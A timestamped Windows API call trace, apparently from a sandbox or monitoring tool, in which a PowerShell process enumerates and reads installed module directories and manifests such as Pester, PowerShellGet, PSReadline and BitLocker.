	[0058.738] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff
	[0058.738] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff
	[0058.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.738] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x184c18b090, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31
	[0058.738] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", nBufferLength=0x105, lpBuffer=0x184c18b030, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", lpFilePart=0x0) returned 0x32
	[0058.738] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x184c18b240 | out: lpFindFileData=0x184c18b240) returned 0x1505fc884f0
	[0058.738] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b290 | out: lpFindFileData=0x184c18b290) returned 1
	[0058.738] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b290 | out: lpFindFileData=0x184c18b290) returned 1
	[0058.738] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b290 | out: lpFindFileData=0x184c18b290) returned 0
	[0058.738] FindClose (in: hFindFile=0x1505fc884f0 | out: hFindFile=0x1505fc884f0) returned 1
	[0058.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.739] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x184c18b090, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31
	[0058.739] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", nBufferLength=0x105, lpBuffer=0x184c18b030, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", lpFilePart=0x0) returned 0x32
	[0058.739] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x184c18b240 | out: lpFindFileData=0x184c18b240) returned 0x1505fc87950
	[0058.739] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18b290 | out: lpFindFileData=0x184c18b290) returned 1
	[0058.739] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18b290 | out: lpFindFileData=0x184c18b290) returned 1
	[0058.739] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18b290 | out: lpFindFileData=0x184c18b290) returned 0
	[0058.739] FindClose (in: hFindFile=0x1505fc87950 | out: hFindFile=0x1505fc87950) returned 1
	[0058.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.740] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b410) returned 1
	[0058.740] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x184c18af00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37
	[0058.740] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", nBufferLength=0x105, lpBuffer=0x184c18aea0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", lpFilePart=0x0) returned 0x38
	[0058.740] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*", lpFindFileData=0x184c18b0b0 | out: lpFindFileData=0x184c18b0b0) returned 0x1505fc884f0
	[0058.740] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.740] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.740] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.740] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.741] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.741] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.741] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.741] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.741] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.741] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.741] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.741] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.741] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.742] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.742] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 1
	[0058.742] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b100 | out: lpFindFileData=0x184c18b100) returned 0
	[0058.742] FindClose (in: hFindFile=0x1505fc884f0 | out: hFindFile=0x1505fc884f0) returned 1
	[0058.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b360) returned 1
	[0058.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b320) returned 1
	[0058.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b410) returned 1
	[0058.742] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x184c18af00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37
	[0058.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b360) returned 1
	[0058.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b320) returned 1
	[0058.743] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b440) returned 1
	[0058.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b400) returned 1
	[0058.743] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b470) returned 1
	[0058.743] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b160 | out: lpFindFileData=0x184c18b160) returned 1
	[0058.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b3c0) returned 1
	[0058.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b380) returned 1
	[0058.743] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5d0) returned 1
	[0058.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b590) returned 1
	[0058.744] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b600) returned 1
	[0058.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b550) returned 1
	[0058.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b510) returned 1
	[0058.744] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b640) returned 1
	[0058.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b600) returned 1
	[0058.744] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x184c18af00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43
	[0058.744] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b3e0) returned 1
	[0058.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b350) returned 1
	[0058.745] CloseHandle (hObject=0x8fc) returned 1
	[0058.748] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b410) returned 1
	[0058.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b360) returned 1
	[0058.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b320) returned 1
	[0058.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b410) returned 1
	[0058.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b360) returned 1
	[0058.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b320) returned 1
	[0058.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b440) returned 1
	[0058.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b400) returned 1
	[0058.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b470) returned 1
	[0058.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b3c0) returned 1
	[0058.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b380) returned 1
	[0058.752] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5d0) returned 1
	[0058.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b590) returned 1
	[0058.752] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b600) returned 1
	[0058.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b550) returned 1
	[0058.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b510) returned 1
	[0058.752] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b640) returned 1
	[0058.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b600) returned 1
	[0058.752] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x184c18af00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53
	[0058.752] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b3e0) returned 1
	[0058.753] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b350) returned 1
	[0058.753] CloseHandle (hObject=0x8fc) returned 1
	[0058.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b410) returned 1
	[0058.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b360) returned 1
	[0058.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b320) returned 1
	[0058.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b410) returned 1
	[0058.757] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b360) returned 1
	[0058.757] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b320) returned 1
	[0058.757] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b280) returned 1
	[0058.757] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b1d0) returned 1
	[0058.757] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b190) returned 1
	[0058.757] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b280) returned 1
	[0058.757] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b1d0) returned 1
	[0058.757] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b190) returned 1
	[0058.757] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b2b0) returned 1
	[0058.757] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b270) returned 1
	[0058.757] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b2e0) returned 1
	[0058.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b230) returned 1
	[0058.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b1f0) returned 1
	[0058.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b440) returned 1
	[0058.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b400) returned 1
	[0058.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b470) returned 1
	[0058.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b3c0) returned 1
	[0058.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b380) returned 1
	[0058.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5d0) returned 1
	[0058.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b590) returned 1
	[0058.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b600) returned 1
	[0058.759] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b550) returned 1
	[0058.759] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b510) returned 1
	[0058.759] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b640) returned 1
	[0058.759] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b600) returned 1
	[0058.759] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0x184c18af00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49
	[0058.759] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b3e0) returned 1
	[0058.759] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b350) returned 1
	[0058.759] ReadFile (in: hFile=0x8fc, lpBuffer=0x150477ce318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b4b8, lpOverlapped=0x0 | out: lpBuffer=0x150477ce318*, lpNumberOfBytesRead=0x184c18b4b8*=0x2e1, lpOverlapped=0x0) returned 1
	[0058.760] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b760) returned 1
	[0058.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b720) returned 1
	[0058.760] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b790) returned 1
	[0058.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b6e0) returned 1
	[0058.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b6a0) returned 1
	[0058.761] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b730) returned 1
	[0058.761] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b420 | out: lpFindFileData=0x184c18b420) returned 1
	[0058.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b680) returned 1
	[0058.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b640) returned 1
	[0058.762] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b730) returned 1
	[0058.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b680) returned 1
	[0058.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b640) returned 1
	[0058.762] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.763] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.763] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.763] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.763] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.763] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.763] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5d0) returned 1
	[0058.763] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b590) returned 1
	[0058.763] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b600) returned 1
	[0058.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\", nBufferLength=0x105, lpBuffer=0x184c18b090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\", lpFilePart=0x0) returned 0x45
	[0058.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b550) returned 1
	[0058.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b510) returned 1
	[0058.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5d0) returned 1
	[0058.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b590) returned 1
	[0058.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b600) returned 1
	[0058.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b550) returned 1
	[0058.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b510) returned 1
	[0058.765] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.765] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.765] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5d0) returned 1
	[0058.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b590) returned 1
	[0058.765] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b600) returned 1
	[0058.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b550) returned 1
	[0058.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b510) returned 1
	[0058.766] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.766] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.766] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5d0) returned 1
	[0058.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b590) returned 1
	[0058.767] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b600) returned 1
	[0058.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b550) returned 1
	[0058.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b510) returned 1
	[0058.767] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.767] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5d0) returned 1
	[0058.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b590) returned 1
	[0058.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b600) returned 1
	[0058.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\", nBufferLength=0x105, lpBuffer=0x184c18b090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\", lpFilePart=0x0) returned 0x3d
	[0058.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b550) returned 1
	[0058.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b510) returned 1
	[0058.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.769] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.769] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5d0) returned 1
	[0058.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b590) returned 1
	[0058.769] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b600) returned 1
	[0058.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b550) returned 1
	[0058.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b510) returned 1
	[0058.773] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.774] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.774] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5d0) returned 1
	[0058.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b590) returned 1
	[0058.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b600) returned 1
	[0058.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b550) returned 1
	[0058.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b510) returned 1
	[0058.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.776] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b290 | out: lpFindFileData=0x184c18b290) returned 0
	[0058.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.776] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5d0) returned 1
	[0058.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b590) returned 1
	[0058.776] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b600) returned 1
	[0058.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b550) returned 1
	[0058.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b510) returned 1
	[0058.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b5a0) returned 1
	[0058.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4f0) returned 1
	[0058.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4b0) returned 1
	[0058.779] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18b290 | out: lpFindFileData=0x184c18b290) returned 1
	[0058.781] FindNextFileW (in: hFindFile=0x1505fc87a10, lpFindFileData=0x184c18b290 | out: lpFindFileData=0x184c18b290) returned 1
	[0058.784] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds\\*", lpFindFileData=0x184c18b240 | out: lpFindFileData=0x184c18b240) returned 0x1505fc884f0
	[0058.787] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\*", lpFindFileData=0x184c18b240 | out: lpFindFileData=0x184c18b240) returned 0x1505fc884f0
	[0058.790] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.xaml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.xaml")) returned 0xffffffff
